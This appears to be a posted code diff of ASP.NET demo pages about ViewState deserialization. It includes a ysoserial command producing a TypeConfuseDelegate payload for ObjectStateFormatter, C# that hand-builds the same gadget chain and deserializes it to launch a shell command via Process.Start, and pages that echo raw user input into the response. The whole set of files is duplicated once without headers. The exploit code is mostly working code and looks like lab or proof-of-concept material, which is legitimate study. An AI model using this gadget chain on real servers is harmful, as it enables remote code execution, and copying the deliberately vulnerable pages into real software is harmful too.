vncloudsco · November 8, 2019 08:10
diff --git a/backen.aspx b/backen.aspx
 using System;
 using System.Collections.Generic;
 using System.Web;
 using System.Web.UI;
 using System.Web.UI.WebControls;
 using System.Text.RegularExpressions;
 using System.Text;
 using System.IO;
 public partial class hello : System.Web.UI.Page
 {
 protected void Page_Load(object sender, EventArgs e)
 {
 }
 
 protected void Button1_Click(object sender, EventArgs e)
 {
 Label1.Text = TextArea1.Text.ToString();
 }
 }
diff --git a/ecode.aspx b/ecode.aspx
 <%@ Page Language=”C#” AutoEventWireup=”true” CodeFile=”hello.aspx.cs” Inherits=”hello” %>
 <!DOCTYPE html>
 <html xmlns=”http://www.w3.org/1999/xhtml">
 <head runat=”server”>
 <title></title>
 </head>
 <body>
 <form id=”form1" runat=”server”>
 <asp:TextBox id=”TextArea1" TextMode=”multiline” Columns=”50" Rows=”5" runat=”server” />
 <asp:Button ID=”Button1" runat=”server” OnClick=”Button1_Click”
 Text=”GO” class=”btn”/>
 <br />
 <asp:Label ID=”Label1" runat=”server”></asp:Label>
 </form>
 </body>
 </html>
diff --git a/fix.aspx b/fix.aspx
 using System;
 using System.Collections.Generic;
 using System.Web;
 using System.Web.UI;
 using System.Web.UI.WebControls;
 using System.Text.RegularExpressions;
 using System.Text;
 using System.IO;
 public class BasePage : System.Web.UI.Page
 {
 protected override void Render(HtmlTextWriter writer)
 {
 StringBuilder sb = new StringBuilder();
 StringWriter sw = new StringWriter(sb);
 HtmlTextWriter hWriter = new HtmlTextWriter(sw);
 base.Render(hWriter);
 string html = sb.ToString();
 html = Regex.Replace(html, “<input[^>]*id=\”(__VIEWSTATE)\”[^>]*>”, string.Empty, RegexOptions.IgnoreCase);
 writer.Write(html);
 }
 }
 public partial class hello : BasePage
 {
 protected void Page_Load(object sender, EventArgs e)
 {
 }
 
 protected void Button1_Click(object sender, EventArgs e)
 {
 Label1.Text = TextArea1.Text.ToString();
 }
 }
diff --git a/payload b/payload
 ysoserial.exe -o base64 -g TypeConfuseDelegate
 -f ObjectStateFormatter -c "echo 123 > C:\Windows\temp\test.txt" > payload_when_mac_disabled
diff --git a/Test.aspx b/Test.aspx
 <%@ Page Language="C#" AutoEventWireup="true" CodeFile="TestComment.aspx.cs" Inherits="TestComment" %>
 <!DOCTYPE html>
 <html xmlns="http://www.w3.org/1999/xhtml">
 <head runat="server">
 <title></title>
 </head>
 <body>
 <form id="form1" runat="server">
 <asp:TextBox id="TextArea1" TextMode="multiline" Columns="50" Rows="5" runat="server" />
 <asp:Button ID="Button1" runat="server" OnClick="Button1_Click" Text="GO" />
 <br />
 <br />
 <br />
 <asp:Label ID="Label1" runat="server"></asp:Label>
 </form>
 </body>
 </html>
diff --git a/Test.aspx.cs b/Test.aspx.cs
 using System;
 using System.Collections.Generic;
 using System.Configuration;
 using System.Diagnostics;
 using System.IO;
 using System.Linq;
 using System.Reflection;
 using System.Web;
 using System.Web.UI;
 using System.Web.UI.WebControls;
 public partial class TestComment : System.Web.UI.Page
 {
 protected void Page_Load(object sender, EventArgs e)
 {
 String cmd = “echo 123 > c:\\windows\\temp\\test.txt”;
 Delegate da = new Comparison<string>(String.Compare);
 Comparison<string> d = (Comparison<string>)MulticastDelegate.Combine(da, da);
 IComparer<string> comp = Comparer<string>.Create(d);
 SortedSet<string> set = new SortedSet<string>(comp);
 set.Add(“cmd”);
 set.Add(“/c “ + cmd);
 FieldInfo fi = typeof(MulticastDelegate).GetField(“_invocationList”, BindingFlags.NonPublic | BindingFlags.Instance);
 object[] invoke_list = d.GetInvocationList();
 // Modify the invocation list to add Process::Start(string, string)
 invoke_list[1] = new Func<string, string, Process>(Process.Start);
 fi.SetValue(d, invoke_list);
 MemoryStream stream = new MemoryStream();
 Stream stream1 = new FileStream(“C:\\Windows\\Temp\\serialnet.txt”, FileMode.Create, FileAccess.Write);
 //Serialization using LOSFormatter starts here
 //The serialized output is base64 encoded which cannot be directly fed to ObjectStateFormatter for deserialization hence requires base64 decoding before deserialization 
 LosFormatter los = new LosFormatter();
 los.Serialize(stream1, set);
 stream1.Close();
 }
 protected void Button1_Click(object sender, EventArgs e)
 {
 string serialized_data = File.ReadAllText(@”C:\Windows\Temp\serialnet.txt”);
 //Base64 decode the serialized data before deserialization
 byte[] bytes = Convert.FromBase64String(serialized_data);
 //Deserialization using ObjectStateFormatter starts here
 ObjectStateFormatter osf = new ObjectStateFormatter();
 string test = osf.Deserialize(Convert.ToBase64String(bytes)).ToString();
 }
 }
	using System;
	using System.Collections.Generic;
	using System.Web;
	using System.Web.UI;
	using System.Web.UI.WebControls;
	using System.Text.RegularExpressions;
	using System.Text;
	using System.IO;
	public partial class hello : System.Web.UI.Page
	{
	protected void Page_Load(object sender, EventArgs e)
	{
	}

	protected void Button1_Click(object sender, EventArgs e)
	{
	Label1.Text = TextArea1.Text.ToString();
	}
	}
	<%@ Page Language=”C#” AutoEventWireup=”true” CodeFile=”hello.aspx.cs” Inherits=”hello” %>
	<!DOCTYPE html>
	<html xmlns=”http://www.w3.org/1999/xhtml">
	<head runat=”server”>
	<title></title>
	</head>
	<body>
	<form id=”form1" runat=”server”>
	<asp:TextBox id=”TextArea1" TextMode=”multiline” Columns=”50" Rows=”5" runat=”server” />
	<asp:Button ID=”Button1" runat=”server” OnClick=”Button1_Click”
	Text=”GO” class=”btn”/>
	<br />
	<asp:Label ID=”Label1" runat=”server”></asp:Label>
	</form>
	</body>
	</html>
	ysoserial.exe -o base64 -g TypeConfuseDelegate
	-f ObjectStateFormatter -c "echo 123 > C:\Windows\temp\test.txt" > payload_when_mac_disabled
	<%@ Page Language="C#" AutoEventWireup="true" CodeFile="TestComment.aspx.cs" Inherits="TestComment" %>
	<!DOCTYPE html>
	<html xmlns="http://www.w3.org/1999/xhtml">
	<head runat="server">
	<title></title>
	</head>
	<body>
	<form id="form1" runat="server">
	<asp:TextBox id="TextArea1" TextMode="multiline" Columns="50" Rows="5" runat="server" />
	<asp:Button ID="Button1" runat="server" OnClick="Button1_Click" Text="GO" />
	<br />
	<br />
	<br />
	<asp:Label ID="Label1" runat="server"></asp:Label>
	</form>
	</body>
	</html>
	using System;
	using System.Collections.Generic;
	using System.Configuration;
	using System.Diagnostics;
	using System.IO;
	using System.Linq;
	using System.Reflection;
	using System.Web;
	using System.Web.UI;
	using System.Web.UI.WebControls;
	public partial class TestComment : System.Web.UI.Page
	{
	protected void Page_Load(object sender, EventArgs e)
	{
	String cmd = “echo 123 > c:\\windows\\temp\\test.txt”;
	Delegate da = new Comparison<string>(String.Compare);
	Comparison<string> d = (Comparison<string>)MulticastDelegate.Combine(da, da);
	IComparer<string> comp = Comparer<string>.Create(d);
	SortedSet<string> set = new SortedSet<string>(comp);
	set.Add(“cmd”);
	set.Add(“/c “ + cmd);
	FieldInfo fi = typeof(MulticastDelegate).GetField(“_invocationList”, BindingFlags.NonPublic \| BindingFlags.Instance);
	object[] invoke_list = d.GetInvocationList();
	// Modify the invocation list to add Process::Start(string, string)
	invoke_list[1] = new Func<string, string, Process>(Process.Start);
	fi.SetValue(d, invoke_list);
	MemoryStream stream = new MemoryStream();
	Stream stream1 = new FileStream(“C:\\Windows\\Temp\\serialnet.txt”, FileMode.Create, FileAccess.Write);
	//Serialization using LOSFormatter starts here
	//The serialized output is base64 encoded which cannot be directly fed to ObjectStateFormatter for deserialization hence requires base64 decoding before deserialization
	LosFormatter los = new LosFormatter();
	los.Serialize(stream1, set);
	stream1.Close();
	}
	protected void Button1_Click(object sender, EventArgs e)
	{
	string serialized_data = File.ReadAllText(@”C:\Windows\Temp\serialnet.txt”);
	//Base64 decode the serialized data before deserialization
	byte[] bytes = Convert.FromBase64String(serialized_data);
	//Deserialization using ObjectStateFormatter starts here
	ObjectStateFormatter osf = new ObjectStateFormatter();
	string test = osf.Deserialize(Convert.ToBase64String(bytes)).ToString();
	}
	}